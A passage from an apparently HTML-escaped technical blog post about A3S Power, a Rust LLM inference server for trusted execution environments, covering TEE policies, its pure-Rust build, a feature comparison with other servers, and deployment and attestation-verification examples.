    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;manifest&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ModelManifest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;chat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;model_name&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;ChatRequest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;Pin&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;Box&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="k"&gt;dyn&lt;/span&gt; &lt;span class="n"&gt;Stream&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;Item&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;ChatResponseChunk&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="c1"&gt;// ...&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// Audit log persistence&lt;/span&gt;
&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;AuditLogger&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="k"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;AuditEvent&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;flush&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  TEE Policy Engine
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;TeePolicy&lt;/code&gt; trait demonstrates the flexibility of extension points:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;TeePolicy&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;is_allowed&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tee_type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;TeeType&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;validate_measurement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;measurement&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three preset policies:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;permissive()&lt;/code&gt;&lt;/strong&gt;: Allows all TEE types, no measurement check. For development environments&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;strict()&lt;/code&gt;&lt;/strong&gt;: Only allows hardware TEE (sev-snp, tdx), rejects simulation mode. For production environments&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom&lt;/strong&gt;: Fine-grained control via allowlists and measurement mappings&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When the &lt;code&gt;A3S_POWER_TEE_STRICT=1&lt;/code&gt; environment variable is set, the system automatically removes "simulated" from the allowlist — a safety guardrail preventing accidental use of simulation mode in production.&lt;/p&gt;




&lt;h2&gt;
  
  
  10. Why Pure Rust? The Trust Ledger of Supply Chain Auditing
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: Can You Audit It All?
&lt;/h3&gt;

&lt;p&gt;In a TEE environment, every line of code on the inference path is part of the Trusted Computing Base (TCB). The larger the TCB, the larger the attack surface, and the harder the audit.&lt;/p&gt;

&lt;p&gt;C/C++ code is the biggest risk source in security auditing — buffer overflows, use-after-free, uninitialized memory, and other memory safety vulnerabilities account for the majority of CVE database entries.&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: Pure Rust Inference Path
&lt;/h3&gt;

&lt;p&gt;A3S Power provides the &lt;code&gt;tee-minimal&lt;/code&gt; build configuration — currently the smallest auditable LLM inference stack in existence:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Build Config&lt;/th&gt;
&lt;th&gt;Inference Backend&lt;/th&gt;
&lt;th&gt;Dependency Tree Lines&lt;/th&gt;
&lt;th&gt;C Dependencies&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;default&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;mistralrs (candle)&lt;/td&gt;
&lt;td&gt;~2,000&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;tee-minimal&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;picolm (pure Rust)&lt;/td&gt;
&lt;td&gt;~1,220&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;llamacpp&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;llama.cpp&lt;/td&gt;
&lt;td&gt;~1,800+&lt;/td&gt;
&lt;td&gt;Yes (C++)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The &lt;code&gt;tee-minimal&lt;/code&gt; configuration includes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;picolm backend&lt;/strong&gt;: ~4,500 lines of pure Rust code, complete transformer forward pass. Zero C dependencies — every line of code can be audited by the Rust toolchain&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Complete TEE stack&lt;/strong&gt;: attestation, model integrity (SHA-256), log redaction, memory zeroing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Encrypted model loading&lt;/strong&gt;: AES-256-GCM, supports in-memory and streaming decryption&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RA-TLS transport&lt;/strong&gt;: attestation embedded in X.509 certificate&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vsock transport&lt;/strong&gt;: for communication inside a3s-box MicroVM
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Build minimal TEE configuration&lt;/span&gt;
cargo build &lt;span class="nt"&gt;--release&lt;/span&gt; &lt;span class="nt"&gt;--no-default-features&lt;/span&gt; &lt;span class="nt"&gt;--features&lt;/span&gt; tee-minimal
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For TEE deployments, pure Rust means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Auditable scope&lt;/strong&gt;: 1,220 dependency tree lines vs 2,000+, 40% reduction in audit workload&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No C/C++ toolchain&lt;/strong&gt;: No need to trust the correctness of gcc/clang compilers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory safety guarantees&lt;/strong&gt;: Rust compiler verifies memory safety at compile time, no runtime checks needed&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Minimized &lt;code&gt;unsafe&lt;/code&gt; blocks&lt;/strong&gt;: &lt;code&gt;unsafe&lt;/code&gt; in picolm is only used for mmap and madvise system calls, each individually auditable&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  picolm Is Not a Toy
&lt;/h3&gt;

&lt;p&gt;picolm is a complete, production-ready transformer inference engine:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Attention mechanism&lt;/strong&gt;: Multi-head attention + Grouped Query Attention (GQA), supports Q/K/V bias (Qwen, Phi)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Feed-forward network&lt;/strong&gt;: SwiGLU (LLaMA, Mistral, Phi) and GeGLU (Gemma) activation variants&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Positional encoding&lt;/strong&gt;: RoPE with pre-computed cos/sin tables, supports partial dimensions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Normalization&lt;/strong&gt;: RMSNorm, per-layer on-demand dequantization&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dequantization&lt;/strong&gt;: Q4_K, Q5_K, Q6_K, Q8_0, Q4_0, F16, F32&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fused kernels&lt;/strong&gt;: Dequantization + dot product in single pass, no intermediate buffers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Parallel computation&lt;/strong&gt;: Rayon multi-threaded row-parallel matrix multiply&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FP16 KV cache&lt;/strong&gt;: Half-precision storage, memory halved&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;BPE tokenizer&lt;/strong&gt;: Complete GPT-style byte pair encoding, supports ChatML templates&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  11. Compared to Ollama, vLLM, TGI — Where's the Gap?
&lt;/h2&gt;

&lt;p&gt;Let's look at the table directly:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Capability&lt;/th&gt;
&lt;th&gt;Ollama&lt;/th&gt;
&lt;th&gt;vLLM&lt;/th&gt;
&lt;th&gt;TGI&lt;/th&gt;
&lt;th&gt;A3S Power&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;OpenAI-compatible API&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GPU acceleration&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Streaming&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TEE hardware isolation (SEV-SNP / TDX)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote attestation (hardware-signed proof)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Model attestation binding&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RA-TLS (attestation in TLS handshake)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Encrypted model loading (AES-256-GCM, 3 modes)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deep log redaction (10 keys + error sanitization)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory zeroing (zeroize on drop)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Client verification SDK&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hardware signature verification (AMD KDS / Intel PCS)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Layer-streaming inference (10B model in 256MB)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-backend auto-routing (edge→GPU TEE seamless upgrade)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pure Rust inference path (fully auditable)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  When Should You Use A3S Power?
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Use A3S Power:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Processing regulated data (SOX, GLBA, HIPAA, GDPR) requiring technical guarantees rather than policy promises&lt;/li&gt;
&lt;li&gt;Multi-tenant AI platforms needing hardware-level tenant isolation&lt;/li&gt;
&lt;li&gt;Need to prove to clients or auditors that inference data wasn't leaked&lt;/li&gt;
&lt;li&gt;Model weights are core intellectual property that needs protection from operator copying&lt;/li&gt;
&lt;li&gt;Need to run a 10B model on $10, 256MB hardware for security decisions&lt;/li&gt;
&lt;li&gt;Edge deployment scenarios: IoT gateways, embedded devices, memory-constrained container environments&lt;/li&gt;
&lt;li&gt;Supply chain security requires the inference path to be fully auditable (no C/C++ dependencies)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Use traditional inference servers:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Internal deployment with full trust in infrastructure&lt;/li&gt;
&lt;li&gt;Extremely latency-sensitive, TEE overhead not acceptable&lt;/li&gt;
&lt;li&gt;Need to maximize GPU utilization (vLLM's PagedAttention)&lt;/li&gt;
&lt;li&gt;Data being processed is not sensitive&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  12. If You Need to Deploy Today
&lt;/h2&gt;

&lt;p&gt;If you need to get A3S Power running today, here's what you need to know.&lt;/p&gt;

&lt;h3&gt;
  
  
  Fastest Start: Development Mode
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# power.hcl — minimal config&lt;/span&gt;
&lt;span class="nx"&gt;bind&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"0.0.0.0"&lt;/span&gt;
&lt;span class="nx"&gt;port&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;11434&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Start&lt;/span&gt;
a3s-power &lt;span class="nt"&gt;--config&lt;/span&gt; power.hcl

&lt;span class="c"&gt;# Pull a model&lt;/span&gt;
curl &lt;span class="nt"&gt;-X&lt;/span&gt; POST http://localhost:11434/v1/models/pull &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Content-Type: application/json"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'{"model": "qwen2.5:0.5b"}'&lt;/span&gt;

&lt;span class="c"&gt;# Inference (same experience as Ollama)&lt;/span&gt;
curl http://localhost:11434/v1/chat/completions &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Content-Type: application/json"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'{"model": "qwen2.5:0.5b", "messages": [{"role": "user", "content": "hello"}]}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Production Mode: Full TEE
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# power.hcl — production TEE config&lt;/span&gt;
&lt;span class="nx"&gt;bind&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"0.0.0.0"&lt;/span&gt;
&lt;span class="nx"&gt;port&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;11434&lt;/span&gt;
&lt;span class="nx"&gt;tls_port&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;11443&lt;/span&gt;

&lt;span class="c1"&gt;# TEE security&lt;/span&gt;
&lt;span class="nx"&gt;tee_mode&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="nx"&gt;ra_tls&lt;/span&gt;   &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="nx"&gt;model_hashes&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="s2"&gt;"llama3.2:3b"&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"sha256:a1b2c3d4e5f6..."&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="nx"&gt;model_signing_key&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"a1b2c3d4..."&lt;/span&gt;

&lt;span class="c1"&gt;# Encrypted models&lt;/span&gt;
&lt;span class="nx"&gt;in_memory_decrypt&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="nx"&gt;model_key_source&lt;/span&gt;  &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"A3S_MODEL_KEY"&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Privacy protection&lt;/span&gt;
&lt;span class="nx"&gt;redact_logs&lt;/span&gt;             &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="nx"&gt;suppress_token_metrics&lt;/span&gt;  &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Build minimal TEE binary&lt;/span&gt;
cargo build &lt;span class="nt"&gt;--release&lt;/span&gt; &lt;span class="nt"&gt;--no-default-features&lt;/span&gt; &lt;span class="nt"&gt;--features&lt;/span&gt; tee-minimal

&lt;span class="c"&gt;# Start inside SEV-SNP VM&lt;/span&gt;
&lt;span class="nv"&gt;A3S_MODEL_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"your-64-hex-char-key"&lt;/span&gt; a3s-power &lt;span class="nt"&gt;--config&lt;/span&gt; power.hcl
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Client Verification
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Verify the server's TEE attestation&lt;/span&gt;
a3s-power-verify &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--url&lt;/span&gt; https://your-server:11443 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--model&lt;/span&gt; llama3.2:3b &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--expected-hash&lt;/span&gt; sha256:a1b2c3d4e5f6...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or use the SDK:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;use&lt;/span&gt; &lt;span class="nn"&gt;a3s_power_verify&lt;/span&gt;&lt;span class="p"&gt;::{&lt;/span&gt;&lt;span class="n"&gt;verify_report&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;VerifyOptions&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;report&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;fetch_attestation&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nf"&gt;verify_report&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;report&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;VerifyOptions&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;Some&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;expected_model_hash&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;Some&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;expected_hash&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;expected_measurement&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;Some&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;known_measurement&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;hardware_verifier&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;Some&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;amd_kds_verifier&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="c1"&gt;// Verification passed, safe to send inference requests&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Position in the A3S Ecosystem
&lt;/h3&gt;

&lt;p&gt;A3S Power is the inference engine of the A3S privacy-preserving AI platform, running inside the a3s-box MicroVM:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌──────────────────────────────────────────────────────────────────┐
│                         A3S Ecosystem                             │
│                                                                   │
│  ┌──────────────────────────────────────────────────────────┐    │
│  │  a3s-box MicroVM (AMD SEV-SNP / Intel TDX)               │    │
